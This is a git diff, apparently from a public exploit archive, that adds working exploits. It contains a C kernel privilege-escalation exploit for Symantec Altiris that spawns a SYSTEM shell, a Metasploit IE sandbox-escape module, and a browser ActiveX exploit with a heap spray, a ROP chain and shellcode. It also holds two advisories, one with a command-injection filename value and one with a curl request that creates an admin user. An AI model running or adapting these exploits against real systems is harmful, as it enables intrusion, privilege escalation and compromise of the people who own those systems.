+
+
+
+DWORD HalDispatchTableAddress() 
+{
+    _NtQuerySystemInformation    NtQuerySystemInformation;
+    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
+    DWORD                        HalDispatchTable;
+    CHAR                         kFullName[256];
+    PVOID                        kBase = NULL;
+    LPSTR                        kName;
+    HMODULE                      Kernel;
+    FUNCTPTR                     Hal;
+    ULONG                        len;
+    NTSTATUS                     status;
+
+
+    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+ 	
+    if (!NtQuerySystemInformation)
+    {
+        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+        return -1;  
+    }
+
+    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
+
+    if (!status) 
+    {
+        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
+        return -1;
+    }
+		
+    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
+
+    if(pModuleInfo == NULL)
+    {
+        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
+        return -1;
+    }
+
+    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
+	
+    memset(kFullName, 0x00, sizeof(kFullName));
+    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
+    kBase = pModuleInfo->Module[0].Base;
+
+    printf("[i] Kernel base name %s\n", kFullName);
+    kName = strrchr(kFullName, '\\');
+
+    Kernel = LoadLibraryA(++kName);
+
+    if(Kernel == NULL) 
+    {
+        printf("[-] Failed to load kernel base\n\n");
+        return -1;
+    }
+
+    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
+
+    if(Hal == NULL)
+    {
+        printf("[-] Failed to find HalDispatchTable\n\n");
+        return -1;
+    }
+    
+    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
+    printf("[i] Kernel handle 0x%08x\n", Kernel);
+    printf("[i] Kernel base address 0x%08x\n", kBase);          
+
+    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
+
+    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
+
+    if(!HalDispatchTable)
+    {
+        printf("[-] Failed to calculate HalDispatchTable\n\n");
+	return -1;
+    }
+
+    return HalDispatchTable;
+}
+
+
+int GetWindowsVersion()
+{
+    int v = 0;
+    DWORD version = 0, minVersion = 0, majVersion = 0;
+
+    version = GetVersion();
+
+    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
+    majVersion = (DWORD)(LOBYTE(LOWORD(version)));
+
+    if (minVersion == 1 && majVersion == 5) v = 1;  // "Windows XP;
+    if (minVersion == 1 && majVersion == 6) v = 2;  // "Windows 7";
+    if (minVersion == 2 && majVersion == 5) v = 3;  // "Windows Server 2003;
+
+    return v;
+}
+
+
+void spawnShell()
+{
+    STARTUPINFOA si;
+    PROCESS_INFORMATION pi;
+
+
+    ZeroMemory(&pi, sizeof(pi));
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    si.cb          = sizeof(si); 
+    si.dwFlags     = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOWNORMAL;
+
+    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+    {
+        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
+        return;
+    }
+
+    CloseHandle(pi.hThread);
+    CloseHandle(pi.hProcess);
+}
+
+
+int main(int argc, char *argv[]) 
+{
+
+    _NtQueryIntervalProfile     NtQueryIntervalProfile;   
+    BYTE                        *inbuffer;
+    BYTE                        *shell;
+    LPVOID                      addrtoshell = (LPVOID)0x746f6353;
+    HANDLE                      hDevice;
+    DWORD                       dwRetBytes = 0;
+    DWORD                       HalDispatchTableTarget;              
+    ULONG                       time = 0;
+    unsigned char               devhandle[MAX_PATH]; 
+
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf(" Symantec Altiris Agent Arbitrary (alkernel.sys) Arbitrary Write EoP Exploit   \n");
+    printf("           Tested on Windows XP SP3/Windows Server 2003 SP2 (32bit)            \n");
+    printf("-------------------------------------------------------------------------------\n\n");
+
+
+    if (GetWindowsVersion() == 1) 
+    {
+        printf("[i] Running Windows XP\n");
+    }
+
+    if (GetWindowsVersion() == 3) 
+    {
+        printf("[i] Running Windows Server 2003\n");
+    }
+
+    if (GetWindowsVersion() == 0) 
+    {
+        printf("[i] Exploit not supported on this OS\n\n");
+        return -1;
+    }  
+
+    sprintf(devhandle, "\\\\.\\%s", "alkernel");
+
+    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
+ 	
+    if (!NtQueryIntervalProfile)
+    {
+        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
+        return -1;  
+    }
+   
+    inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    memset(inbuffer, 0x41, INBUFSIZE);   
+       
+    shell = VirtualAlloc(addrtoshell, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    if(shell == NULL)
+    {
+        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
+        return -1;
+    }
+    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", shell);
+
+    memset(addrtoshell, 0x90, BUFSIZE);
+
+    if (GetWindowsVersion() == 1) 
+    {
+       memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
+       printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
+    }
+
+    if (GetWindowsVersion() == 3) 
+    {
+       memcpy(addrtoshell, token_steal_w2k3, sizeof(token_steal_w2k3));
+       printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w2k3));
+    }
+
+    printf("[+] Shellcode located at address 0x%.8x\n", addrtoshell);
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if (hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
+        return -1;
+    }
+    else 
+    {
+        printf("[+] Open %s device successful\n", devhandle);
+    }
+
+    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
+    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
+   
+    printf("[~] Press any key to send Exploit  . . .\n");
+    getch();
+
+    DeviceIoControl(hDevice, 0x00222000, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
+
+    printf("[+] Buffer sent\n");
+    CloseHandle(hDevice);
+
+    printf("[+] Spawning SYSTEM Shell\n");
+    NtQueryIntervalProfile(2, &time);
+    spawnShell();
+
+    return 0;
+}
diff --git a/platforms/windows/local/35983.rb b/platforms/windows/local/35983.rb
new file mode 100755
index 000000000..bd14c2605
--- /dev/null
+++ b/platforms/windows/local/35983.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape',
+      'Description'    => %q{
+        This module abuses a process creation policy in Internet Explorer's sandbox, specifically
+        the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape
+        the Protected Mode, and execute code with Medium Integrity. At the moment, this module only
+        bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested
+        successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # From Threat Intel of Symantec
+          'Henry Li', # Public vulnerability analysis
+          'juan vazquez' # Metasploit module
+        ],
+      'Platform'       => 'win',
+      'SessionTypes'   => ['meterpreter'],
+      'Arch'           => [ARCH_X86],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 30
+        },
+      'Targets'        =>
+        [
+          [ 'Protected Mode (Windows 7) / 32 bits',
+            {
+              'Arch' => ARCH_X86
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'Payload'        =>
+        {
+          'Space'       => 4096,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          ['CVE', '2015-0016'],
+          ['MSB', 'MS15-004'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/']
+        ],
+      'DisclosureDate' => 'Jan 13 2015'
+    }))
+  end
+
+  def check
+    temp = get_env('WINDIR')
+    dll_path = "#{temp}\\System32\\TSWbPrxy.exe"
+
+    win_ver = sysinfo['OS']
+
+    unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/
+      return Exploit::CheckCode::Safe
+    end
+
+    unless file_exist?(dll_path)
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Detected
+  end
+
+  def exploit
+    print_status('Checking target...')
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::NotVulnerable, 'System not vulnerable')
+    end
+
+    if session.platform !~ /^x86\//
+      fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment')
+    end
+
+    win_ver = sysinfo['OS']
+    if win_ver =~ /Windows 2012|Windows 8/
+      fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment')
+    end
+
+    print_status('Checking the Process Integrity Level...')
+
+    unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NotVulnerable, 'Not running at Low Integrity')
+    end
+
+    cmd = cmd_psh_payload(
+      payload.encoded,
+      payload_instance.arch.first,
+      { :remove_comspec => true }
+    )
+
+    print_status('Storing payload on environment variable...')
+    cmd.gsub!('powershell.exe ','')
+    session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd)
+
+    print_status('Exploiting...')
+    temp = get_env('TEMP')
+    # Using the old meterpreter loader, if it's loaded with
+    # Reflective DLL Injection the exceptions in the sandbox
+    # policy won't apply.
+    session.core.load_library(
+      'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
+      'TargetFilePath'  => temp +  '\\cve-2015-0016.dll',
+      'UploadLibrary'   => true,
+      'Extension'       => false,
+      'SaveToDisk'      => false
+    )
+  end
+
+  def cleanup
+    session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil)
+    super
+  end
+
+end
\ No newline at end of file
diff --git a/platforms/windows/remote/35948.html b/platforms/windows/remote/35948.html
new file mode 100755
index 000000000..9b82d0baa
--- /dev/null
+++ b/platforms/windows/remote/35948.html
@@ -0,0 +1,272 @@
+<!DOCTYPE HTML>
+
+<!--
+
+
+###############################################################################
+*
+* Exploit Title: X360 VideoPlayer ActiveX Control RCE Full ASLR & DEP Bypass
+* Author: Rh0
+* Date: Jan 30 2015
+* Affected Software: X360 VideoPlayer ActiveX Control 2.6 (VideoPlayer.ocx)
+* Vulnerability: Buffer Overflow in Data Section
+* Tested on: Internet Explorer 10 32-bit (Windows 7 64-bit in VirtualBox)
+* Software Links:
+  http://www.x360soft.com/demo/videoplayersetup.exe
+  http://download.cnet.com/X360-Video-Player-ActiveX-Control/3000-2170_4-10581185.html
+
+* Detailed writeup: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/
+*
+###############################################################################
+
+
+* Information about VideoPlayer.ocx *
+###################################
+
+md5sum: f9f2d32ae0e4d7b5c19692d0753451fb
+
+Class VideoPlayer
+GUID: {4B3476C6-185A-4D19-BB09-718B565FA67B}
+Number of Interfaces: 1
+Default Interface: _DVideoPlayer
+RegKey Safe for Script: True
+RegkeySafe for Init: True
+KillBitSet: False
+
+* NOTES *
+#########
+
+*) When passing an overlong string to the ActiveX object's "SetText" method, a
+buffer overflow in the data section occurs. It allows overwriting a subsequent
+pointer that can be used in a controlled memcpy when dispatching the object's
+"SetFontName" method. With this arbitrary write, array structures can be
+manipulated to gain access to complete process memory. Equipped with this
+capability, necessary information can be leaked and manipulated to execute
+arbitrary code remotely.
+*) Comment in the alert messages to see some leaks ;)
+*) This is PoC Code: If it does not work for you, clear IE's history and try
+again. Tested against mshtml.dll and jscript9.dll version 10.0.9200.17183
+
+
+*) Inspired by:
+"http://blog.exodusintel.com/2013/12/09/a-browser-is-only-as-strong-as-its-weakest-byte-part-2/"
+"http://ifsec.blogspot.de/2013/11/exploiting-internet-explorer-11-64-bit.html"
+"https://cansecwest.com/slides/2014/The Art of Leaks - read version - Yoyo.pdf"
+"https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf"
+"https://github.com/exp-sky/HitCon-2014-IE-11-0day-Windows-8.1-Exploit/blob/master/IE 11 0day & Windows 8.1 Exploit.pdf"
+
+-->
+
+<html>
+<body>
+<button onclick=run()>runme</button>
+<script>
+function run(){
+    /* VideoPlayer.ocx image has the rebase flag set =>
+       It's mapped to another base per process run */
+    /* create its vulnerable ActiveX object (as HTMLObjectElement) */
+    var obj = document.createElement("object");
+    obj.setAttribute("classid", "clsid:4B3476C6-185A-4D19-BB09-718B565FA67B");
+
+    /* amount of arrays to create on the heap */
+    nrArrays = 0x1000
+
+    /* size of data in one array block: 0xefe0 bytes =>
+       subract array header (0x20) and space for typed array headers (0x1000)
+       from 0x10000 */
+    arrSize =  (0x10000-0x20-0x1000)/4
+
+    /* heap array container will hold our heap sprayed data */
+    arr = new Array(nrArrays)
+
+    /* use one buffer for all typed arrays */
+    intArrBuf = new ArrayBuffer(4)
+    
+    /* spray the heap with array data blocks and subsequent typed array headers
+       of type Uint32Array */
+    k = 0
+    while(k < nrArrays){
+        /* create "jscript9!Js::JavascriptArray" with blocksize 0xf000 (data
+           aligned at 0xXXXX0020) */
+        arr[k] = new Array(arrSize);
+        /* fill remaining page (0x1000) after array data with headers of
+           "jscript9!Js::TypedArray<unsigned int>"  (0x55 * 0x30 = 0xff0) as a
+           typed array header has the size of 0x30. 0x10 bytes are left empty */
+        for(var i= 0; i<0x55; i++){
+            /* headers become aligned @ 0xXXXXf000, 0xXXXXf030, 0xXXXXf060,.. */
+            arr[k][i] = new Uint32Array(intArrBuf, 0, 1);
+        }
+        /* tag the array's last element */
+        arr[k][arrSize - 1] = 0x12121212
+        k += 1;
+    }
+
+    /* perform controlled memwrite to 0x1111f010: typed array header is at
+       0x1111f000 to 0x1111f030 => overwrite array data header @ 11111f010 with
+       0x00000001 0x00000004 0x00000040 0x1111f030 0x00
+       The first 3 dwords are sideeffects due to the code we abuse for the
+       controlled memcpy */
+    addr = 0x1111f010  // WHERE TO WRITE
+    /* prepare buffer with address we want to write to */
+    ptrBuf = ""
+    /* fill buffer: length = relative pointer address - buffer start + pointer
+       offset */
+    while (ptrBuf.length < (0x92068 - 0x916a8 + 0xC)){ptrBuf += "A"}
+    ptrBuf += dword2str(addr)
+
+    /* trigger: overflow buffer and overwrite the pointer value after buffer */
+    obj.SetText(ptrBuf,0,0)
+    //alert("buffer overflown => check PTR @ videop_1+92068: dc videop_1+92068")
+
+    /* use overwritten pointer after buffer with method "SetFontName" to conduct
+       memory write.  We overwrite a typed array's header length to 0x40 and let
+       its buffer point to the next typed array header at 0x1111f030 (see above)
+       */
+    obj.SetFontName(dword2str(addr+0x20)) // WHAT TO WRITE
+
+    /* find the corrupted Uint32Array (typed array) */
+    k = 0
+    arrCorrupt = 0
+    while(k < 0x1000-1){
+        for(var i = 0; i < 0x55-1; i++){
+            if(arr[k][i][0] != 0){
+                // address of jscript9!Js::TypedArray<unsigned int>::`vftable'
+                //alert("0x" + arr[k][i][0].toString(16))
+                arrCorrupt = 1
+                break
+            }
+        }
+        if (arrCorrupt == 1) break
+        k++
+    }
+
+    if (!arrCorrupt){
+        alert("cannot find corrupted Uint32Array")
+        return -1
+    }
+
+    /* modify subsequent Uint32Array to be able to RW all process memory */
+    arr[k][i][6] = 0x7fffffff // next Uint32Array length
+    arr[k][i][7] = 0 // set buffer of next Uint32Array to start of process mem
+
+    /* our memory READWRITE interface :) */
+    mem = arr[k][i+1]
+    //alert(mem.length.toString(16))
+    if (mem.length != 0x7fffffff){
+        alert("Cannot change Uint32Array length")
+        return -2
+    }
+    /* now we could even repair the change we did with memcpy ... */
+    
+    /* leak several pointers and calculate VideoPlayer.ocx base */
+    arr[k+1][0] = obj // set HTMLObjectElement as first element
+    //alert(mem[0x11120020/4].toString(16))
+    arrayElemPtr = mem[(addr + 0x1010)/4] // leak array elem. @ 0x11120020 (obj)
+    objPtr = mem[arrayElemPtr/4 + 6] // deref array elem. + 0x18
+    heapPtrVideoplayer = mem[objPtr/4 + 25] // deref HTMLObjectElement + 0x64
+    /* deref heap pointer containing VideoPlayer.ocx pointer */
+    videoplayerPtr = mem[heapPtrVideoplayer/4] 
+    base = videoplayerPtr - 0x6b3b0 // calculate base
+
+    /* check if we have the image of VideoPlayer.ocx
+       check for MZ9000 header and "Vide" string at offset 0x6a000 */
+    if (mem[base/4] != 0x905a4d ||
+        mem[(base+0x6a000)/4] != 0x65646956){
+        alert("Cannot find VideoPlayer.ocx base or its version is wrong")
+        return -3
+    }
+    //alert(base.toString(16))
+
+    /* get VirtualAlloc from imports of VideoPlayer.ocx */
+    virtualAlloc = mem[(base + 0x69174)/4]
+    /* memcpy is available inside VideoPlayer.ocx */
+    memcpy = base + 0x15070
+    //alert("0x" + virtualAlloc.toString(16) + " " + 0x" + memcpy.toString(16))
+    
+    /* create shellcode (./msfvenom -p windows/exec cmd=calc) */
+    sc = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"+
+    "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"+
+    "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"+
+    "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"+
+    "\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"+
+    "\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"+
+    "\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"+
+    "\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"+
+    "\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"+
+    "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"+
+    "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"+
+    "\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"+
+    "\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"+
+    "\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"+
+    "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"+
+    "\x00"
+
+    scBuf = new Uint8Array(sc.length)
+    for (n=0; n<sc.length; n++){
+        scBuf[n] = sc.charCodeAt(n)
+    }
+
+    /* leak shellcode address */
+    arr[k+1][0] = scBuf
+    /* therefore, leak array element at 0x11120020 (typed array header of
+       Uint8Array containing shellcode) ... */
+    elemPtr = mem[(addr + 0x1010)/4] 
+    /* ...and deref array element + 0x1c (=> leak shellcode's buffer address) */
+    scAddr = mem[(elemPtr/4) + 7] 
+    //alert(scAddr.toString(16))
+
+    /* create and leak rop buffer */
+    rop = new Uint32Array(0x1000)
+    arr[k+1][0] = rop
+    /* leak array element at 0x11120020 (typed array header) */
+    elemPtr = mem[(addr + 0x1010)/4] 
+    /* deref array element + 0x1c (leak rop's buffer address) */
+    pAddr = mem[(elemPtr/4) + 7]  // payload address
+
+    /* ROP chain (rets in comments are omitted) */
+    /* we perform:
+       (void*) EAX = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_RWX)
+       memcpy(EAX, shellcode, shellcodeLen)
+       (void(*)())EAX() */
+    offs = 0x30/4           // offset to chain after CALL [EAX+0x30]
+    rop[0] = base + 0x1ff6           // ADD ESP, 0x30;
+    rop[offs + 0x0] = base + 0x1ea1e // XCHG EAX, ESP; <-- first gadget called 
+    rop[offs + 0x1] = virtualAlloc   // allocate RWX mem (address avail. in EAX)
+    rop[offs + 0x2] = base + 0x10e9  // POP ECX; => pop the value at offs + 0x7
+    rop[offs + 0x3] = 0              // lpAddress
+    rop[offs + 0x4] = 0x1000         // dwSize (0x1000)
+    rop[offs + 0x5] = 0x1000         // flAllocationType (MEM_COMMIT)
+    rop[offs + 0x6] = 0x40           // flProtect (PAGE_EXECUTE_READWRITE)
+    rop[offs + 0x7] = pAddr + (offs+0xe)*4  // points to memcpy's dst param (*2)
+    rop[offs + 0x8] = base + 0x1c743 // MOV [ECX], EAX; => set dst to RWX mem
+    rop[offs + 0x9] = base + 0x10e9  // POP ECX;
+    rop[offs + 0xa] = pAddr + (offs+0xd)*4  // points to (*1) in chain
+    rop[offs + 0xb] = base + 0x1c743 // MOV [ECX], EAX; => set return to RWX mem
+    rop[offs + 0xc] = memcpy
+    rop[offs + 0xd] = 0xffffffff  // (*1): ret addr to RWX mem filled at runtime
+    rop[offs + 0xe] = 0xffffffff  // (*2): dst for memcpy filled at runtime
+    rop[offs + 0xf] = scAddr   // shellcode src addr to copy to RWX mem (param2)
+    rop[offs + 0x10] = sc.length     // length  of shellcode (param3)
+
+    /* manipulate object data to gain EIP control with "Play" method */
+    videopObj = mem[objPtr/4 + 26]
+    mem[(videopObj-0x10)/4] = pAddr // pAddr will be used in EAX in below call
+
+    /* eip control @ VideoPlayer.ocx + 0x6643B: CALL DWORD PTR [EAX+0x30] */
+    obj.Play() 
+
+}
+
+/* dword to little endian string */
+function dword2str(dword){
+    str = ""
+    for (n=0; n<4; n++){
+        str += String.fromCharCode((dword >> 8*n) & 0xff)
+    }
+    return str
+
+}
+//setTimeout(run(), 3000);
+</script>
+</body>
+</html>
diff --git a/platforms/windows/remote/35949.txt b/platforms/windows/remote/35949.txt
new file mode 100755
index 000000000..eab4ff97e
--- /dev/null
+++ b/platforms/windows/remote/35949.txt
@@ -0,0 +1,89 @@
+Vantage Point Security Advisory 2014-007
+========================================
+
+Title: Symantec Encryption Management Server - Remote Command Injection
+ID: VP-2014-007
+Vendor: Symantec
+Affected Product: Symantec Encryption Gateway
+Affected Versions: < 3.2.0 MP6
+Product Website: http://www.symantec.com/en/sg/gateway-email-encryption/
+Author: Paul Craig <paul[at]vantagepoint[dot]sg
+
+
+Summary:
+---------
+Symantec Gateway Email Encryption provides centrally managed email encryption
+to secure email communications with customers and partners regardless of whether
+or not recipients have their own email encryption software.
+With Gateway Email Encryption, organizations can minimize the risk of
+a data breach while complying with regulatory mandates for information
+security and privacy.
+
+Details:
+---------
+Remote Command Injection vulnerabilities occur when user supplied
+input is used directly as a command line argument to a fork(), execv()
+or a CreateProcessA() function.
+
+It was found that the binary /usr/bin/pgpsysconf calls the binary
+/usr/bin/pgpbackup with unfiltered user supplied input when restoring
+a Database Backup from the Symantec Encryption Management Web
+Interface .
+The user supplied 'filename' value is used directly as a command
+argument, and can be concatenated to include additional commands with
+the use of the pipe character.
+This can allow a lower privileged Administrator to compromise the
+Encryption Management Server.
+
+This is demonstrated below in a snippet from pgpsysconf;
+
+.text:08058FEA                 mov     dword ptr [ebx], offset
+aUsrBinPgpbacku ; "/usr/bin/pgpbackup"
+.text:08058FF0                 cmp     [ebp+var_1D], 0
+.text:08058FF4                 jnz     short loc_8059049
+.text:08058FF6                 mov     ecx, 4
+.text:08058FFB                 mov     edx, 8
+.text:08059000                 mov     eax, 0Ch
+.text:08059005                 mov     dword ptr [ebx+ecx], offset unk_807AE50
+.text:0805900C                 mov     [ebx+edx], esi
+.text:0805900F                 mov     dword ptr [ebx+eax], 0
+.text:08059016                 call    _fork           ;  Bingo..
+
+An example to exploit this vulnerability and run the ping command can
+be seen below.
+
+POST /omc/uploadBackup.event ....
+....
+
+Content-Disposition: form-data; name="file";
+filename="test123|`ping`|-whatever.tar.gz.pgp"
+
+This vulnerability can be further exploited to gain local root access
+by calling the setuid binary pgpsysconf to install a local package
+file.
+
+
+Fix Information:
+---------
+Upgrade to Symantec Encryption Management Server 3.3.2 MP7.
+See http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150129_00
+for more information
+
+Timeline:
+---------
+2014/11/26: Issue Reported.
+2015/01/30: Patch Released.
+
+
+About Vantage Point Security:
+---------
+
+Vantage Point Security is the leading provider for penetration testing
+and security advisory services in Singapore. Clients in the Financial,
+Banking and Telecommunications industries  select Vantage Point
+Security based on technical competency and a proven track record to
+deliver significant and measurable improvements in their security
+posture.
+
+Web: https://www.vantagepoint.sg/
+Contact: office[at]vantagepoint[dot]sg
diff --git a/platforms/windows/webapps/35982.txt b/platforms/windows/webapps/35982.txt
new file mode 100755
index 000000000..f75cbed13
--- /dev/null
+++ b/platforms/windows/webapps/35982.txt
@@ -0,0 +1,122 @@
+Mogwai Security Advisory MSA-2015-02
+----------------------------------------------------------------------
+Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
+CVE-ID: CVE-2014-7883
+Product: Hewlett-Packard Universal CMDB (UCMDB)    
+Affected versions: UCMDB 10.10 (Other versions might also be affected) 
+Impact: high
+Remote: yes
+Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html
+Reported: 14/11/2014 
+by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) 
+
+
+Vendor's Description of the Software:
+----------------------------------------------------------------------
+The HP Universal CMDB (UCMDB) automatically collects and manages accurate and
+current business service definitions, associated infrastructure relationships and
+detailed information on the assets, and is a central component in many of the key processes in your
+IT organization, such as change management, asset management, service management, and business
+service management. The UCMDB ensures that these processes can rely on comprehensive and
+true data for all business services. Together with HP UCMDB Configuration Manager
+(UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear
+policies, and defined authorization process.
+Many IT organizations turn to a CMDB and configuration management processes to create a
+shared single version of truth to support business service management, IT service management,
+change management, and asset management initiatives. These initiatives help align IT efforts
+with business requirements and run IT operations more efficiently and effectively.
+The initiatives success depends on the CMDB providing a complete view into the
+configuration items (CIs) and assets as well as how various IT elements relate together to deliver
+the business service.
+-----------------------------------------------------------------------
+
+Business recommendation:
+-----------------------------------------------------------------------
+Apply configuration changes from HP 
+https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169
+
+
+-- CVSS2 Ratings ------------------------------------------------------
+
+CVSS Base Score: 6.4
+Impact Subscore: 4.9
+Exploitability Subscore: 10
+CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
+-----------------------------------------------------------------------
+
+
+Vulnerability description:
+----------------------------------------------------------------------
+UCMB administrators heavily rely on a JMX-Console, which is installed by
+default.
+The JMX-Console web application in UCMDB performs access control only for 
+the GET and POST methods, which allows remote attackers to send requests 
+to this application's GET handler by using a different method (for example
+HEAD).
+
+The web.xml file of the JMX Console contains following security constrains:
+
+<security-constraint>
+<web-resource-collection>
+<web-resource-name>Protected Pages</web-resource-name>
+<url-pattern>/*</url-pattern>
+<http-method>GET</http-method>
+<http-method>POST</http-method>
+</web-resource-collection>
+<auth-constraint>
+<role-name>sysadmin</role-name>
+</auth-constraint>
+</security-constraint>
+
+<security-constraint>
+<web-resource-collection>
+<web-resource-name>Callhome Servlet</web-resource-name>
+<url-pattern>/callhome</url-pattern>
+<http-method>GET</http-method>
+<http-method>POST</http-method>
+</web-resource-collection>
+</security-constraint>
+
+This vulnerability is identical with CVE-2010-0738 (JBoss JMX-Console 
+Authentication bypass). This can be used to create a new account which 
+can then be used to access the JMX console.
+
+
+Proof of concept:
+----------------------------------------------------------------------
+
+The following Curl command will send a HEAD request to create a new user
+"pocuser" in the UCMDB Backend:
+
+curl -I
+"http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"
+
+Disclosure timeline:
+----------------------------------------------------------------------
+14/11/2014: Reporting issue to HP
+18/11/2014: Re-Reporting, as no acknowledge received
+18/11/2014: Acknowledge from HP
+02/01/2015: Requesting status update from HP
+29/01/2015: Requesting status update from HP
+31/01/2015: Response from HP, they plan to release the advisory next week
+02/05/2015: HP releases security bulletin
+03/05/2015: Mogwai security bulletin release
+
+
+Advisory URL:
+----------------------------------------------------------------------
+https://www.mogwaisecurity.de/#lab
+
+
+References:
+----------------------------------------------------------------------
+Official HP security bulletin
+https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906
+
+
+----------------------------------------------------------------------
+Mogwai, IT-Sicherheitsberatung Muench
+Steinhoevelstrasse 2/2
+89075 Ulm (Germany)
+
+info@mogwaisecurity.de 
\ No newline at end of file